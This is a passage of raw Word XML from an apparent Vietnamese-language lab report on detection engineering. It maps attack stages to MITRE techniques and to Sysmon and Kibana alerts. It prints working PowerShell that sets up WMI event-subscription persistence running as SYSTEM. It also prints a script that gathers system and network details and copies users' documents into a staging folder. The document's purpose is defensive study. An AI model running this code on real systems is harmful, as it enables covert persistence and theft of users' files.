      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00003020">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC5D2E9" wp14:editId="081166A9">
            <wp:extent cx="6120130" cy="3606165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9448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2770" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3606165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B677E" w14:textId="0306217A" w:rsidR="00003020" w:rsidRDefault="00003020" w:rsidP="00003020">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 5: </w:t>
      </w:r>
      <w:r w:rsidRPr="00354930">
        <w:t>Sysmon EventID 1 ghi nhận fodhelper.exe spawn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD90165" w14:textId="77777777" w:rsidR="00671801" w:rsidRPr="00671801" w:rsidRDefault="00671801" w:rsidP="00671801"/>
    <w:p w14:paraId="5DBF136D" w14:textId="77777777" w:rsidR="00671801" w:rsidRDefault="00671801" w:rsidP="00671801">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00671801">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65B230C7" wp14:editId="7011FA14">
            <wp:extent cx="6120130" cy="2549525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="193347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74693" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2549525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE53402" w14:textId="3147964E" w:rsidR="00671801" w:rsidRPr="00671801" w:rsidRDefault="00671801" w:rsidP="00671801">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 6: </w:t>
      </w:r>
      <w:r w:rsidRPr="00772399">
        <w:t>Alert C1 — UAC Bypass via Fodhelper xuất hiện trong Kibana SIEM với severity=High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2CD245" w14:textId="77777777" w:rsidR="00671801" w:rsidRDefault="00671801">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="025E5243" w14:textId="7CB3D62F" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phase 4 — Persistence (T1546.003): WMI Event Subscription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01B4A" w14:paraId="359BEED4"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7786832B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Technique</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E62F69D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1546.003 — Event Triggered Execution: WMI Event Subscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="0F05E1A4"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3A26165B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Tactic</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23464A4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0003 — Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="19C551F5"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6FADFFEE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Event ID</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14045E0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 19 (WmiEventFilter), EID 20 (WmiEventConsumer), EID 21 (WmiEventConsumerToFilter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="53012A80"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41E5E498" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log Source</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B7F703A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Microsoft-Windows-Sysmon/Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="12FBCDE6"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6EC84AA3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ECS Field chính</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4E43CC3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>winlog.event_id, winlog.event_data.Consumer, winlog.event_data.Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="49B45794"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6116A7DA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mức độ nguy hiểm</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D3231FC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical — risk_score: 99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2690AA19" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DA590D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>payload.ps1 (chạy với quyền Admin nhờ fodhelper) ghi svhw.ps1 vào C:\Windows\Temp\, rồi cài 3 WMI objects trong namespace root\subscription. Sau khi __FilterToConsumerBinding được tạo, persistence hoàn chỉnh — payload tự động chạy mỗi khi notepad.exe được mở, dưới quyền SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519704A3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2999D4E8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># payload.ps1 — Cai dat WMI Event Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D898D2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70F87524"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1. Ghi payload script vao disk (Admin -&gt; C:\Windows\Temp\)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B2E8D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Set-Content -Path 'C:\Windows\Temp\svhw.ps1' -Value $svhwContent -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AE582"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0963739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2. Cai WMI Filter — dieu kien trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47550BC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$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B2323B"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Name           = 'NotepadFilter'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DBFD9"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EventNameSpace = 'root\cimv2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F5CD6F"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QueryLanguage  = 'WQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD700D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Query          = "SELECT * FROM __InstanceCreationEvent WITHIN 5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654889C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 WHERE TargetInstance ISA 'Win32_Process'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD993CC"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 AND TargetInstance.Name = 'notepad.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807B50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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9998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1D448A5F"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3. Cai WMI Consumer — payload duoc thuc thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D115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$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E09B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Name                = 'SystemDumpConsumer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98BC8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CommandLineTemplate = 'powershell.exe -ep bypass -w hidden -noni -f "C:\Windows\Temp\svhw.ps1"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D846BB8"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RunInteractively    = $false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25370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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBEDF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26A40274"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4. Binding — ket noi Filter voi Consumer — PERSISTENCE LIVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFEF60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Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C324FB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Filter = $filter; Consumer = $consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112967EB"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 Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C84519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7B3A5EDF"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Correlation Rule C2 bat sequence: EID 19 -&gt; 20 -&gt; 21 (maxspan=30s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09569590" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># EventID 21 xac nhan: payload se tu dong chay moi khi notepad.exe mo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B4753A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B020995" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sau khi EventID 21 (FilterToConsumerBinding) được ghi nhận, WMI persistence hoàn chỉnh. WMI Consumer chạy dưới NT AUTHORITY\SYSTEM, không có file thực thi riêng, không có registry Run key — antivirus truyền thống không phát hiện được. Subscription tồn tại qua reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326181E7" w14:textId="77777777" w:rsidR="00671801" w:rsidRDefault="00671801" w:rsidP="00671801">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00671801">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="189CA73F" wp14:editId="3EFD55A4">
            <wp:extent cx="6120130" cy="3545840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74511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19530" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3545840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F45A365" w14:textId="6D81CC43" w:rsidR="00671801" w:rsidRDefault="00671801" w:rsidP="00671801">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 7: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E41779">
        <w:t>Sysmon EventID 19, 20, 21 được ghi nhận liên tiếp trong Event Viewer — WMI subscription installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A829E1D" w14:textId="77777777" w:rsidR="00671801" w:rsidRDefault="00671801" w:rsidP="00671801"/>
    <w:p w14:paraId="6E082C6B" w14:textId="77777777" w:rsidR="00671801" w:rsidRDefault="00671801" w:rsidP="00671801">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00671801">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1358F962" wp14:editId="7CF47197">
            <wp:extent cx="6120130" cy="2550795"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="23649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97410" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2550795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="511C93F9" w14:textId="78830AD9" w:rsidR="00671801" w:rsidRPr="00671801" w:rsidRDefault="00671801" w:rsidP="00671801">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 8: </w:t>
      </w:r>
      <w:r w:rsidRPr="006752AE">
        <w:t>Alert C2 — WMI Persistence Full Install Chain xuất hiện trong Kibana SIEM với severity=Critical]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3395835F" w14:textId="77777777" w:rsidR="00671801" w:rsidRDefault="00671801">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D55A8BD" w14:textId="448B6B05" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phase 5 — Discovery &amp; Collection (T1082 + T1016 + T1005)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01B4A" w14:paraId="57508CE0"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4A371C60" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Technique</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F4864D1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1082 — System Information Discovery; T1016 — Network Config Discovery; T1005 — Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2E47ADEA"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48395D3E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Tactic</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BBAF4A1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0007 — Discovery; TA0009 — Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="4E821D6A"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0EE7B34A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Event ID</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9D5EA15" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1 (arp.exe spawn), EID 11 (FileCreate trong wdmp\)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="13F5DEBB"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70AF5A06" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log Source</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21D9550" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Microsoft-Windows-Sysmon/Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="36E346FC"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5A6E560B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ECS Field chính</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5E7C0FB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.name, process.parent.name, file.path, user.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="4C0AB9E8"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4826F74E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mức độ nguy hiểm</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9EA494C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High — risk_score: 73</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="528AD631" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3347F8A2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>svhw.ps1 chạy trong Session 0 dưới SYSTEM khi notepad.exe được mở. Phase này thực hiện hai nhóm hành động: (1) Discovery — thu thập thông tin hệ thống và mạng, (2) Collection — copy file từ Desktop, Documents, Downloads của tất cả user vào staging directory C:\Windows\Temp\wdmp\.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A28BB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65996B84" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># svhw.ps1 — Discovery (chay duoi SYSTEM qua WMI Consumer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BEA23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3161C3B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T1082/T1016: System &amp; Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9F068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$os = Get-WmiObject Win32_OperatingSystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9120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$ip = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4580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$_.InterfaceAlias -notlike '*Loopback*'} | Select-Object -First 3).IPAddress -join ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4070D53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$arp = (arp -a) -join "`n"  # Sinh EID 1 — arp.exe spawned by PowerShell/SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B050F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$info = "HOST: $env:COMPUTERNAME`nOS: $($os.Caption)`nIP: $ip"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1EA6C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$info | Out-File "$wd\info.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F065EC"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1982FBD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T1005: Data from Local System — Copy-Item (KHONG sinh EID 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5103DFD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$folders = @('C:\Users\*\Desktop','C:\Users\*\Documents','C:\Users\*\Downloads')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEFD32"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$extensions = @('*.txt','*.csv','*.docx','*.xlsx','*.pdf','*.sql','*.json')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034229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foreach ($folder in $folders) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F898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$files = Get-ChildItem $folder -Include $extensions -Recurse -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EC640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foreach ($file in $files) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC724C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Copy-Item $file.FullName $wd  # Sinh EID 11 cho moi file copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D9FEBF"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2E0E97D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E2E9C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1C2EF0E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Diem quan trong: Copy-Item la PS cmdlet noi bo, KHONG tao child process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD7D14"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=&gt; EID 1 khong ghi nhan T1005. Chi EID 11 (FileCreate) ghi nhan file duoc copy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F144A75" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># =&gt; Detection C3 bắt EID 1 (arp.exe) hoac EID 11 fallback (file staging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E24D5A" w14:textId="77777777" w:rsidR="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00104BF2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="401C8D7A" wp14:editId="0D628279">
            <wp:extent cx="6120130" cy="3529330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14832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3718" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3529330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5804791D" w14:textId="3EA742CC" w:rsidR="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 9: </w:t>
